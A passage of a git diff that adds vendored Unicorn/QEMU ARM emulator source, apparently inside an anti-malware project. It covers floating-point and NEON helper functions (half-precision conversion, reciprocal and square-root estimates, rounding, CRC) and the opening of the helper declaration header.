(env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0; + float32 r = float16_to_float32(make_float16(a), ieee, s); + if (ieee) { + return float32_maybe_silence_nan(r); + } + return r; +} + +static uint32_t do_fcvt_f32_to_f16(float32 a, CPUARMState *env, float_status *s) +{ + int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0; + float16 r = float32_to_float16(a, ieee, s); + if (ieee) { + r = float16_maybe_silence_nan(r); + } + return float16_val(r); +} + +float32 HELPER(neon_fcvt_f16_to_f32)(uint32_t a, CPUARMState *env) +{ + return do_fcvt_f16_to_f32(a, env, &env->vfp.standard_fp_status); +} + +uint32_t HELPER(neon_fcvt_f32_to_f16)(float32 a, CPUARMState *env) +{ + return do_fcvt_f32_to_f16(a, env, &env->vfp.standard_fp_status); +} + +float32 HELPER(vfp_fcvt_f16_to_f32)(uint32_t a, CPUARMState *env) +{ + return do_fcvt_f16_to_f32(a, env, &env->vfp.fp_status); +} + +uint32_t HELPER(vfp_fcvt_f32_to_f16)(float32 a, CPUARMState *env) +{ + return do_fcvt_f32_to_f16(a, env, &env->vfp.fp_status); +} + +float64 HELPER(vfp_fcvt_f16_to_f64)(uint32_t a, CPUARMState *env) +{ + int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0; + float64 r = float16_to_float64(make_float16(a), ieee, &env->vfp.fp_status); + if (ieee) { + return float64_maybe_silence_nan(r); + } + return r; +} + +uint32_t HELPER(vfp_fcvt_f64_to_f16)(float64 a, CPUARMState *env) +{ + int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0; + float16 r = float64_to_float16(a, ieee, &env->vfp.fp_status); + if (ieee) { + r = float16_maybe_silence_nan(r); + } + return float16_val(r); +} + +#define float32_two make_float32(0x40000000) +#define float32_three make_float32(0x40400000) +#define float32_one_point_five make_float32(0x3fc00000) + +float32 HELPER(recps_f32)(float32 a, float32 b, CPUARMState *env) +{ + float_status *s = &env->vfp.standard_fp_status; + if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) || + (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) { + if (!(float32_is_zero(a) || float32_is_zero(b))) { + float_raise(float_flag_input_denormal, s); + } + return float32_two; + } + return float32_sub(float32_two, float32_mul(a, b, s), s); +} + +float32 HELPER(rsqrts_f32)(float32 a, float32 b, CPUARMState *env) +{ + float_status *s = &env->vfp.standard_fp_status; + float32 product; + if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) || + (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) { + if (!(float32_is_zero(a) || float32_is_zero(b))) { + float_raise(float_flag_input_denormal, s); + } + return float32_one_point_five; + } + product = float32_mul(a, b, s); + return float32_div(float32_sub(float32_three, product, s), float32_two, s); +} + +/* NEON helpers. */ + +/* Constants 256 and 512 are used in some helpers; we avoid relying on + * int->float conversions at run-time. */ +#define float64_256 make_float64(0x4070000000000000LL) +#define float64_512 make_float64(0x4080000000000000LL) +#define float32_maxnorm make_float32(0x7f7fffff) +#define float64_maxnorm make_float64(0x7fefffffffffffffLL) + +/* Reciprocal functions + * + * The algorithm that must be used to calculate the estimate + * is specified by the ARM ARM, see FPRecipEstimate() + */ + +static float64 recip_estimate(float64 a, float_status *real_fp_status) +{ + /* These calculations mustn't set any fp exception flags, + * so we use a local copy of the fp_status. + */ + float_status dummy_status = *real_fp_status; + float_status *s = &dummy_status; + /* q = (int)(a * 512.0) */ + float64 q = float64_mul(float64_512, a, s); + int64_t q_int = float64_to_int64_round_to_zero(q, s); + + /* r = 1.0 / (((double)q + 0.5) / 512.0) */ + q = int64_to_float64(q_int, s); + q = float64_add(q, float64_half, s); + q = float64_div(q, float64_512, s); + q = float64_div(float64_one, q, s); + + /* s = (int)(256.0 * r + 0.5) */ + q = float64_mul(q, float64_256, s); + q = float64_add(q, float64_half, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* return (double)s / 256.0 */ + return float64_div(int64_to_float64(q_int, s), float64_256, s); +} + +/* Common wrapper to call recip_estimate */ +static float64 call_recip_estimate(float64 num, int off, float_status *fpst) +{ + uint64_t val64 = float64_val(num); + uint64_t frac = extract64(val64, 0, 52); + int64_t exp = extract64(val64, 52, 11); + uint64_t sbit; + float64 scaled, estimate; + + /* Generate the scaled number for the estimate function */ + if (exp == 0) { + if (extract64(frac, 51, 1) == 0) { + exp = -1; + frac = extract64(frac, 0, 50) << 2; + } else { + frac = extract64(frac, 0, 51) << 1; + } + } + + /* scaled = '0' : '01111111110' : fraction<51:44> : Zeros(44); */ + scaled = make_float64((0x3feULL << 52) + | extract64(frac, 44, 8) << 44); + + estimate = recip_estimate(scaled, fpst); + + /* Build new result */ + val64 = float64_val(estimate); + sbit = 0x8000000000000000ULL & val64; + exp = off - exp; + frac = extract64(val64, 0, 52); + + if (exp == 0) { + frac = 1ULL << 51 | extract64(frac, 1, 51); + } else if (exp == -1) { + frac = 1ULL << 50 | extract64(frac, 2, 50); + exp = 0; + } + + return make_float64(sbit | (exp << 52) | frac); +} + +static bool round_to_inf(float_status *fpst, bool sign_bit) +{ + switch (fpst->float_rounding_mode) { + case float_round_nearest_even: /* Round to Nearest */ + return true; + case float_round_up: /* Round to +Inf */ + return !sign_bit; + case float_round_down: /* Round to -Inf */ + return sign_bit; + case float_round_to_zero: /* Round to Zero */ + return false; + default: + break; + } + + g_assert_not_reached(); + return false; +} + +float32 HELPER(recpe_f32)(float32 input, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f32 = float32_squash_input_denormal(input, fpst); + uint32_t f32_val = float32_val(f32); + uint32_t f32_sbit = 0x80000000ULL & f32_val; + int32_t f32_exp = extract32(f32_val, 23, 8); + uint32_t f32_frac = extract32(f32_val, 0, 23); + float64 f64, r64; + uint64_t r64_val; + int64_t r64_exp; + uint64_t r64_frac; + + if (float32_is_any_nan(f32)) { + float32 nan = f32; + if (float32_is_signaling_nan(f32)) { + float_raise(float_flag_invalid, fpst); + nan = float32_maybe_silence_nan(f32); + } + if (fpst->default_nan_mode) { + nan = float32_default_nan; + } + return nan; + } else if (float32_is_infinity(f32)) { + return float32_set_sign(float32_zero, float32_is_neg(f32)); + } else if (float32_is_zero(f32)) { + float_raise(float_flag_divbyzero, fpst); + return float32_set_sign(float32_infinity, float32_is_neg(f32)); + } else if ((f32_val & ~(1ULL << 31)) < (1ULL << 21)) { + /* Abs(value) < 2.0^-128 */ + float_raise(float_flag_overflow | float_flag_inexact, fpst); + if (round_to_inf(fpst, f32_sbit)) { + return float32_set_sign(float32_infinity, float32_is_neg(f32)); + } else { + return float32_set_sign(float32_maxnorm, float32_is_neg(f32)); + } + } else if (f32_exp >= 253 && fpst->flush_to_zero) { + float_raise(float_flag_underflow, fpst); + return float32_set_sign(float32_zero, float32_is_neg(f32)); + } + + + f64 = make_float64(((int64_t)(f32_exp) << 52) | (int64_t)(f32_frac) << 29); + r64 = call_recip_estimate(f64, 253, fpst); + r64_val = float64_val(r64); + r64_exp = extract64(r64_val, 52, 11); + r64_frac = extract64(r64_val, 0, 52); + + /* result = sign : result_exp<7:0> : fraction<51:29>; */ + return make_float32(f32_sbit | + (r64_exp & 0xff) << 23 | + extract64(r64_frac, 29, 24)); +} + +float64 HELPER(recpe_f64)(float64 input, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f64 = float64_squash_input_denormal(input, fpst); + uint64_t f64_val = float64_val(f64); + uint64_t f64_sbit = 0x8000000000000000ULL & f64_val; + int64_t f64_exp = extract64(f64_val, 52, 11); + float64 r64; + uint64_t r64_val; + int64_t r64_exp; + uint64_t r64_frac; + + /* Deal with any special cases */ + if (float64_is_any_nan(f64)) { + float64 nan = f64; + if (float64_is_signaling_nan(f64)) { + float_raise(float_flag_invalid, fpst); + nan = float64_maybe_silence_nan(f64); + } + if (fpst->default_nan_mode) { + nan = float64_default_nan; + } + return nan; + } else if (float64_is_infinity(f64)) { + return float64_set_sign(float64_zero, float64_is_neg(f64)); + } else if (float64_is_zero(f64)) { + float_raise(float_flag_divbyzero, fpst); + return float64_set_sign(float64_infinity, float64_is_neg(f64)); + } else if ((f64_val & ~(1ULL << 63)) < (1ULL << 50)) { + /* Abs(value) < 2.0^-1024 */ + float_raise(float_flag_overflow | float_flag_inexact, fpst); + if (round_to_inf(fpst, f64_sbit)) { + return float64_set_sign(float64_infinity, float64_is_neg(f64)); + } else { + return float64_set_sign(float64_maxnorm, float64_is_neg(f64)); + } + } else if (f64_exp >= 1023 && fpst->flush_to_zero) { + float_raise(float_flag_underflow, fpst); + return float64_set_sign(float64_zero, float64_is_neg(f64)); + } + + r64 = call_recip_estimate(f64, 2045, fpst); + r64_val = float64_val(r64); + r64_exp = extract64(r64_val, 52, 11); + r64_frac = extract64(r64_val, 0, 52); + + /* result = sign : result_exp<10:0> : fraction<51:0> */ + return make_float64(f64_sbit | + ((r64_exp & 0x7ff) << 52) | + r64_frac); +} + +/* The algorithm that must be used to calculate the estimate + * is specified by the ARM ARM. + */ +static float64 recip_sqrt_estimate(float64 a, float_status *real_fp_status) +{ + /* These calculations mustn't set any fp exception flags, + * so we use a local copy of the fp_status. + */ + float_status dummy_status = *real_fp_status; + float_status *s = &dummy_status; + float64 q; + int64_t q_int; + + if (float64_lt(a, float64_half, s)) { + /* range 0.25 <= a < 0.5 */ + + /* a in units of 1/512 rounded down */ + /* q0 = (int)(a * 512.0); */ + q = float64_mul(float64_512, a, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* reciprocal root r */ + /* r = 1.0 / sqrt(((double)q0 + 0.5) / 512.0); */ + q = int64_to_float64(q_int, s); + q = float64_add(q, float64_half, s); + q = float64_div(q, float64_512, s); + q = float64_sqrt(q, s); + q = float64_div(float64_one, q, s); + } else { + /* range 0.5 <= a < 1.0 */ + + int64_t q_int; + + /* a in units of 1/256 rounded down */ + /* q1 = (int)(a * 256.0); */ + q = float64_mul(float64_256, a, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* reciprocal root r */ + /* r = 1.0 /sqrt(((double)q1 + 0.5) / 256); */ + q = int64_to_float64(q_int, s); + q = float64_add(q, float64_half, s); + q = float64_div(q, float64_256, s); + q = float64_sqrt(q, s); + q = float64_div(float64_one, q, s); + } + /* r in units of 1/256 rounded to nearest */ + /* s = (int)(256.0 * r + 0.5); */ + + q = float64_mul(q, float64_256,s ); + q = float64_add(q, float64_half, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* return (double)s / 256.0;*/ + return float64_div(int64_to_float64(q_int, s), float64_256, s); +} + +float32 HELPER(rsqrte_f32)(float32 input, void *fpstp) +{ + float_status *s = fpstp; + float32 f32 = float32_squash_input_denormal(input, s); + uint32_t val = float32_val(f32); + uint32_t f32_sbit = 0x80000000 & val; + int32_t f32_exp = extract32(val, 23, 8); + uint32_t f32_frac = extract32(val, 0, 23); + uint64_t f64_frac; + uint64_t val64; + int result_exp; + float64 f64; + + if (float32_is_any_nan(f32)) { + float32 nan = f32; + if (float32_is_signaling_nan(f32)) { + float_raise(float_flag_invalid, s); + nan = float32_maybe_silence_nan(f32); + } + if (s->default_nan_mode) { + nan = float32_default_nan; + } + return nan; + } else if (float32_is_zero(f32)) { + float_raise(float_flag_divbyzero, s); + return float32_set_sign(float32_infinity, float32_is_neg(f32)); + } else if (float32_is_neg(f32)) { + float_raise(float_flag_invalid, s); + return float32_default_nan; + } else if (float32_is_infinity(f32)) { + return float32_zero; + } + + /* Scale and normalize to a double-precision value between 0.25 and 1.0, + * preserving the parity of the exponent. */ + + f64_frac = ((uint64_t) f32_frac) << 29; + if (f32_exp == 0) { + while (extract64(f64_frac, 51, 1) == 0) { + f64_frac = f64_frac << 1; + f32_exp = f32_exp-1; + } + f64_frac = extract64(f64_frac, 0, 51) << 1; + } + + if (extract64(f32_exp, 0, 1) == 0) { + f64 = make_float64(((uint64_t) f32_sbit) << 32 + | (0x3feULL << 52) + | f64_frac); + } else { + f64 = make_float64(((uint64_t) f32_sbit) << 32 + | (0x3fdULL << 52) + | f64_frac); + } + + result_exp = (380 - f32_exp) / 2; + + f64 = recip_sqrt_estimate(f64, s); + + val64 = float64_val(f64); + + val = ((result_exp & 0xff) << 23) + | ((val64 >> 29) & 0x7fffff); + return make_float32(val); +} + +float64 HELPER(rsqrte_f64)(float64 input, void *fpstp) +{ + float_status *s = fpstp; + float64 f64 = float64_squash_input_denormal(input, s); + uint64_t val = float64_val(f64); + uint64_t f64_sbit = 0x8000000000000000ULL & val; + int64_t f64_exp = extract64(val, 52, 11); + uint64_t f64_frac = extract64(val, 0, 52); + int64_t result_exp; + uint64_t result_frac; + + if (float64_is_any_nan(f64)) { + float64 nan = f64; + if (float64_is_signaling_nan(f64)) { + float_raise(float_flag_invalid, s); + nan = float64_maybe_silence_nan(f64); + } + if (s->default_nan_mode) { + nan = float64_default_nan; + } + return nan; + } else if (float64_is_zero(f64)) { + float_raise(float_flag_divbyzero, s); + return float64_set_sign(float64_infinity, float64_is_neg(f64)); + } else if (float64_is_neg(f64)) { + float_raise(float_flag_invalid, s); + return float64_default_nan; + } else if (float64_is_infinity(f64)) { + return float64_zero; + } + + /* Scale and normalize to a double-precision value between 0.25 and 1.0, + * preserving the parity of the exponent. */ + + if (f64_exp == 0) { + while (extract64(f64_frac, 51, 1) == 0) { + f64_frac = f64_frac << 1; + f64_exp = f64_exp - 1; + } + f64_frac = extract64(f64_frac, 0, 51) << 1; + } + + if (extract64(f64_exp, 0, 1) == 0) { + f64 = make_float64(f64_sbit + | (0x3feULL << 52) + | f64_frac); + } else { + f64 = make_float64(f64_sbit + | (0x3fdULL << 52) + | f64_frac); + } + + result_exp = (3068 - f64_exp) / 2; + + f64 = recip_sqrt_estimate(f64, s); + + result_frac = extract64(float64_val(f64), 0, 52); + + return make_float64(f64_sbit | + ((result_exp & 0x7ff) << 52) | + result_frac); +} + +uint32_t HELPER(recpe_u32)(uint32_t a, void *fpstp) +{ + float_status *s = fpstp; + float64 f64; + + if ((a & 0x80000000) == 0) { + return 0xffffffff; + } + + f64 = make_float64((0x3feULL << 52) + | ((int64_t)(a & 0x7fffffff) << 21)); + + f64 = recip_estimate(f64, s); + + return 0x80000000 | ((float64_val(f64) >> 21) & 0x7fffffff); +} + +uint32_t HELPER(rsqrte_u32)(uint32_t a, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f64; + + if ((a & 0xc0000000) == 0) { + return 0xffffffff; + } + + if (a & 0x80000000) { + f64 = make_float64((0x3feULL << 52) + | ((uint64_t)(a & 0x7fffffff) << 21)); + } else { /* bits 31-30 == '01' */ + f64 = make_float64((0x3fdULL << 52) + | ((uint64_t)(a & 0x3fffffff) << 22)); + } + + f64 = recip_sqrt_estimate(f64, fpst); + + return 0x80000000 | ((float64_val(f64) >> 21) & 0x7fffffff); +} + +/* VFPv4 fused multiply-accumulate */ +float32 VFP_HELPER(muladd, s)(float32 a, float32 b, float32 c, void *fpstp) +{ + float_status *fpst = fpstp; + return float32_muladd(a, b, c, 0, fpst); +} + +float64 VFP_HELPER(muladd, d)(float64 a, float64 b, float64 c, void *fpstp) +{ + float_status *fpst = fpstp; + return float64_muladd(a, b, c, 0, fpst); +} + +/* ARMv8 round to integral */ +float32 HELPER(rints_exact)(float32 x, void *fp_status) +{ + return float32_round_to_int(x, fp_status); +} + +float64 HELPER(rintd_exact)(float64 x, void *fp_status) +{ + return float64_round_to_int(x, fp_status); +} + +float32 HELPER(rints)(float32 x, void *fp_status) +{ + int old_flags = get_float_exception_flags(fp_status), new_flags; + float32 ret; + + ret = float32_round_to_int(x, fp_status); + + /* Suppress any inexact exceptions the conversion produced */ + if (!(old_flags & float_flag_inexact)) { + new_flags = get_float_exception_flags(fp_status); + set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); + } + + return ret; +} + +float64 HELPER(rintd)(float64 x, void *fp_status) +{ + int old_flags = get_float_exception_flags(fp_status), new_flags; + float64 ret; + + ret = float64_round_to_int(x, fp_status); + + new_flags = get_float_exception_flags(fp_status); + + /* Suppress any inexact exceptions the conversion produced */ + if (!(old_flags & float_flag_inexact)) { + new_flags = get_float_exception_flags(fp_status); + set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); + } + + return ret; +} + +/* Convert ARM rounding mode to softfloat */ +int arm_rmode_to_sf(int rmode) +{ + switch (rmode) { + case FPROUNDING_TIEAWAY: + rmode = float_round_ties_away; + break; + case FPROUNDING_ODD: + /* FIXME: add support for TIEAWAY and ODD */ + qemu_log_mask(LOG_UNIMP, "arm: unimplemented rounding mode: %d\n", + rmode); + case FPROUNDING_TIEEVEN: + default: + rmode = float_round_nearest_even; + break; + case FPROUNDING_POSINF: + rmode = float_round_up; + break; + case FPROUNDING_NEGINF: + rmode = float_round_down; + break; + case FPROUNDING_ZERO: + rmode = float_round_to_zero; + break; + } + return rmode; +} + +/* CRC helpers. + * The upper bytes of val (above the number specified by 'bytes') must have + * been zeroed out by the caller. + */ +uint32_t HELPER(crc32_arm)(uint32_t acc, uint32_t val, uint32_t bytes) +{ +#if 0 // FIXME + uint8_t buf[4]; + + stl_le_p(buf, val); + + /* zlib crc32 converts the accumulator and output to one's complement. */ + return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; +#endif + return 0; +} + +uint32_t HELPER(crc32c)(uint32_t acc, uint32_t val, uint32_t bytes) +{ + uint8_t buf[4]; + + stl_le_p(buf, val); + + /* Linux crc32c converts the output to one's complement. */ + return crc32c(acc, buf, bytes) ^ 0xffffffff; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.h new file mode 100644 index 0000000..6427c18 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.h @@ -0,0 +1,544 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_FLAGS_1(clz_arm, TCG_CALL_NO_RWG_SE, i32, i32) + +DEF_HELPER_FLAGS_1(sxtb16, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(uxtb16, TCG_CALL_NO_RWG_SE, i32, i32) + +DEF_HELPER_3(add_setq, i32, env, i32, i32) +DEF_HELPER_3(add_saturate, i32, env, i32, i32) +DEF_HELPER_3(sub_saturate, i32, env, i32, i32) +DEF_HELPER_3(add_usaturate, i32, env, i32, i32) +DEF_HELPER_3(sub_usaturate, i32, env, i32, i32) +DEF_HELPER_2(double_saturate, i32, env, s32) +DEF_HELPER_FLAGS_2(sdiv, TCG_CALL_NO_RWG_SE, s32, s32, s32) +DEF_HELPER_FLAGS_2(udiv, TCG_CALL_NO_RWG_SE, i32, i32, i32) +DEF_HELPER_FLAGS_1(rbit, TCG_CALL_NO_RWG_SE, i32, i32) + +#define PAS_OP(pfx) \ + DEF_HELPER_3(pfx ## add8, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## sub8, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## sub16, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## add16, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## addsubx, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## subaddx, i32, i32, i32, ptr) + +PAS_OP(s) +PAS_OP(u) +#undef PAS_OP + +#define PAS_OP(pfx) \ + DEF_HELPER_2(pfx ## add8, i32, i32, i32) \ + DEF_HELPER_2(pfx ## sub8, i32, i32, i32) \ + DEF_HELPER_2(pfx ## sub16, i32, i32, i32) \ + DEF_HELPER_2(pfx ## add16, i32, i32, i32) \ + DEF_HELPER_2(pfx ## addsubx, i32, i32, i32) \ + DEF_HELPER_2(pfx ## subaddx, i32, i32, i32) +PAS_OP(q) +PAS_OP(sh) +PAS_OP(uq) +PAS_OP(uh) +#undef PAS_OP + +DEF_HELPER_3(ssat, i32, env, i32, i32) +DEF_HELPER_3(usat, i32, env, i32, i32) +DEF_HELPER_3(ssat16, i32, env, i32, i32) +DEF_HELPER_3(usat16, i32, env, i32, i32) + +DEF_HELPER_FLAGS_2(usad8, TCG_CALL_NO_RWG_SE, i32, i32, i32) + +DEF_HELPER_FLAGS_3(sel_flags, TCG_CALL_NO_RWG_SE, + i32, i32, i32, i32) +DEF_HELPER_2(exception_internal, void, env, i32) +DEF_HELPER_3(exception_with_syndrome, void, env, i32, i32) +DEF_HELPER_1(wfi, void, env) +DEF_HELPER_1(wfe, void, env) +DEF_HELPER_1(pre_hvc, void, env) +DEF_HELPER_2(pre_smc, void, env, i32) + +DEF_HELPER_3(cpsr_write, void, env, i32, i32) +DEF_HELPER_1(cpsr_read, i32, env) + +DEF_HELPER_3(v7m_msr, void, env, i32, i32) +DEF_HELPER_2(v7m_mrs, i32, env, i32) + +DEF_HELPER_3(access_check_cp_reg, void, env, ptr, i32) +DEF_HELPER_3(set_cp_reg, void, env, ptr, i32) +DEF_HELPER_2(get_cp_reg, i32, env, ptr) +DEF_HELPER_3(set_cp_reg64, void, env, ptr, i64) +DEF_HELPER_2(get_cp_reg64, i64, env, ptr) + +DEF_HELPER_3(msr_i_pstate, void, env, i32, i32) +DEF_HELPER_1(clear_pstate_ss, void, env) +DEF_HELPER_1(exception_return, void, env) + +DEF_HELPER_2(get_r13_banked, i32, env, i32) +DEF_HELPER_3(set_r13_banked, void, env, i32, i32) + +DEF_HELPER_2(get_user_reg, i32, env, i32) +DEF_HELPER_3(set_user_reg, void, env, i32, i32) + +DEF_HELPER_1(vfp_get_fpscr, i32, env) +DEF_HELPER_2(vfp_set_fpscr, void, env, i32) + +DEF_HELPER_3(vfp_adds, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_addd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_subs, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_subd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_muls, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_muld, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_divs, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_divd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_maxs, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_maxd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_mins, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_mind, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_maxnums, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_maxnumd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_minnums, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_minnumd, f64, f64, f64, ptr) +DEF_HELPER_1(vfp_negs, f32, f32) +DEF_HELPER_1(vfp_negd, f64, f64) +DEF_HELPER_1(vfp_abss, f32, f32) +DEF_HELPER_1(vfp_absd, f64, f64) +DEF_HELPER_2(vfp_sqrts, f32, f32, env) +DEF_HELPER_2(vfp_sqrtd, f64, f64, env) +DEF_HELPER_3(vfp_cmps, void, f32, f32, env) +DEF_HELPER_3(vfp_cmpd, void, f64, f64, env) +DEF_HELPER_3(vfp_cmpes, void, f32, f32, env) +DEF_HELPER_3(vfp_cmped, void, f64, f64, env) + +DEF_HELPER_2(vfp_fcvtds, f64, f32, env) +DEF_HELPER_2(vfp_fcvtsd, f32, f64, env) + +DEF_HELPER_2(vfp_uitos, f32, i32, ptr) +DEF_HELPER_2(vfp_uitod, f64, i32, ptr) +DEF_HELPER_2(vfp_sitos, f32, i32, ptr) +DEF_HELPER_2(vfp_sitod, f64, i32, ptr) + +DEF_HELPER_2(vfp_touis, i32, f32, ptr) +DEF_HELPER_2(vfp_touid, i32, f64, ptr) +DEF_HELPER_2(vfp_touizs, i32, f32, ptr) +DEF_HELPER_2(vfp_touizd, i32, f64, ptr) +DEF_HELPER_2(vfp_tosis, i32, f32, ptr) +DEF_HELPER_2(vfp_tosid, i32, f64, ptr) +DEF_HELPER_2(vfp_tosizs, i32, f32, ptr) +DEF_HELPER_2(vfp_tosizd, i32, f64, ptr) + +DEF_HELPER_3(vfp_toshs_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_tosls_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touhs_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touls_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_toshd_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tosld_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_touhd_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tould_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_toshs, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_tosls, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_tosqs, i64, f32, i32, ptr) +DEF_HELPER_3(vfp_touhs, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touls, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touqs, i64, f32, i32, ptr) +DEF_HELPER_3(vfp_toshd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tosld, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tosqd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_touhd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tould, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_touqd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_shtos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_sltos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_sqtos, f32, i64, i32, ptr) +DEF_HELPER_3(vfp_uhtos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_ultos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_uqtos, f32, i64, i32, ptr) +DEF_HELPER_3(vfp_shtod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_sltod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_sqtod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_uhtod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_ultod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_uqtod, f64, i64, i32, ptr) + +DEF_HELPER_FLAGS_2(set_rmode, TCG_CALL_NO_RWG, i32, i32, env) +DEF_HELPER_FLAGS_2(set_neon_rmode, TCG_CALL_NO_RWG, i32, i32, env) + +DEF_HELPER_2(vfp_fcvt_f16_to_f32, f32, i32, env) +DEF_HELPER_2(vfp_fcvt_f32_to_f16, i32, f32, env) +DEF_HELPER_2(neon_fcvt_f16_to_f32, f32, i32, env) +DEF_HELPER_2(neon_fcvt_f32_to_f16, i32, f32, env) +DEF_HELPER_FLAGS_2(vfp_fcvt_f16_to_f64, TCG_CALL_NO_RWG, f64, i32, env) +DEF_HELPER_FLAGS_2(vfp_fcvt_f64_to_f16, TCG_CALL_NO_RWG, i32, f64, env) + +DEF_HELPER_4(vfp_muladdd, f64, f64, f64, f64, ptr) +DEF_HELPER_4(vfp_muladds, f32, f32, f32, f32, ptr) + +DEF_HELPER_3(recps_f32, f32, f32, f32, env) +DEF_HELPER_3(rsqrts_f32, f32, f32, f32, env) +DEF_HELPER_FLAGS_2(recpe_f32, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(recpe_f64, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_FLAGS_2(rsqrte_f32, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(rsqrte_f64, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_2(recpe_u32, i32, i32, ptr) +DEF_HELPER_FLAGS_2(rsqrte_u32, TCG_CALL_NO_RWG, i32, i32, ptr) +DEF_HELPER_5(neon_tbl, i32, env, i32, i32, i32, i32) + +DEF_HELPER_3(shl_cc, i32, env, i32, i32) +DEF_HELPER_3(shr_cc, i32, env, i32, i32) +DEF_HELPER_3(sar_cc, i32, env, i32, i32) +DEF_HELPER_3(ror_cc, i32, env, i32, i32) + +DEF_HELPER_FLAGS_2(rints_exact, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(rintd_exact, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_FLAGS_2(rints, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(rintd, TCG_CALL_NO_RWG, f64, f64, ptr) + +/* neon_helper.c */ +DEF_HELPER_FLAGS_3(neon_qadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s64, TCG_CALL_NO_RWG, i64, env, i64, i64) +DEF_HELPER_FLAGS_3(neon_sqadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) 